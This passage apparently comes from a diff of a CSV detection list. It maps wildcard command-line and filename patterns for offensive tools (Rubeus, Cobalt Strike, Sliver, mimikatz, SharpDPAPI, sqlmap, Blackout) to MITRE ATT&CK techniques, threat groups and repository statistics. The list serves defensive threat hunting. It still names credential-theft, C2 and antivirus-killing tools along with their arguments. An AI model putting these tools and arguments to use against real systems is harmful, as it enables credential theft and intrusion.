Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --asreproast *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* asreproast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --asreproast *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --asreproast *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --assemblyargs AntiVirus*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --assemblyargs AppLocker*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" -"* Athena.Commands*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"* Athena.Models.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"* athena.mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"* Athena.Commands*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* Athena.Models.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* athena.mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "* --attack bruteforce*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "* --attack injection*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "* --attack partial_d --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -145,29 +145,29 @@ "* --authmode ntlm --username * --password *","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "* auth-owners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* auth-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* avred.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"* avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"* avred.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"* avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "* awsloot.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "* -b *.bin *.bin dump*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" "* BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" -"* --backdoor *","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" -"* backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* --backdoor *","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"* backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "* backorifice-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* backorifice-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* backupkey* /server:* /file*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* backupkey* /server:* /file*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* bacnet-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* banner.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* base64_encode_shellcode*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "* --basic ""FUZZ:FUZ2Z""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --batch --dbs*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --batch --password*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --batch --dbs*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --batch --password*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* beacon.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"* beacon_win_default*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"* beacon_win_default*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "* --beacon=*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "* beacon64.bin *","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","0","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" -"* Benjamin DELPY *","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* Benjamin DELPY *","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "* beRoot.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" -"* bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "* bhqc.py -*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" "* -bindPipe * -destHost * -destPort *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "* bitcoin-getaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -178,18 +178,18 @@ "* Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* Blackout.sys*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" -"* bleeding-jumbo john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 